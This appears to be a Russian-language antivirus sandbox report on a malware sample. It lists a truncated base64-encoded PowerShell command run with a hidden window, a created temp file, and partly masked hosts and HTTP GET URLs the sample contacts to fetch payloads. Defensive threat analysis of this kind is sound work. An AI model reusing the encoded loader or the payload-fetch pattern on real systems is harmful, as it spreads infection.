Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGYAcgBoAHoAawBpAGgAeQA9ACcAUABqAGwAcQBvAG4AbgBlACcAOwAkAEUAcgB5AHEAagBhAGUAdQBxAG4AIAA9ACAAJwA5ADgAJwA7ACQARgB0AHgAbgBzAGoAZQB1AHUAcQA9ACcAQQB3AG0AaABhAG8AaABmAGwAdwBxACcAOwAkAEQAZwB3AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1600
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1166263.cvr
Сетевая активность
Подключается к
- 'et#####ivi.hostly.hu':80
- 'ho####aigon.com.vn':80
- 'ia####eative.co.id':80
- 'ka###365.com':80
- 'ka###365.com':443
TCP
Запросы HTTP GET
- http://et#####ivi.hostly.hu/cgi-bin/Vva/
- http://ho####aigon.com.vn/wp-includes/3kJO484xVE/
- http://ia####eative.co.id/dvbhl/XoyHTPe/
- http://ka###365.com/wp-admin/20l/
Другие
- 'ka###365.com':443
UDP
- DNS ASK et#####ivi.hostly.hu
- DNS ASK ja####lockchain.com
- DNS ASK ho####aigon.com.vn
- DNS ASK ia####eative.co.id
- DNS ASK ka###365.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAGYAcgBoAHoAawBpAGgAeQA9ACcAUABqAGwAcQBvAG4AbgBlACcAOwAkAEUAcgB5AHEAagBhAGUAdQBxAG4AIAA9ACAAJwA5ADgAJwA7ACQARgB0AHgAbgBzAGoAZQB1AHUAcQA9ACcAQQB3AG0AaABhAG8AaABmAGwAdwBxACcAOwAkAEQAZwB3AG...' (со скрытым окном)
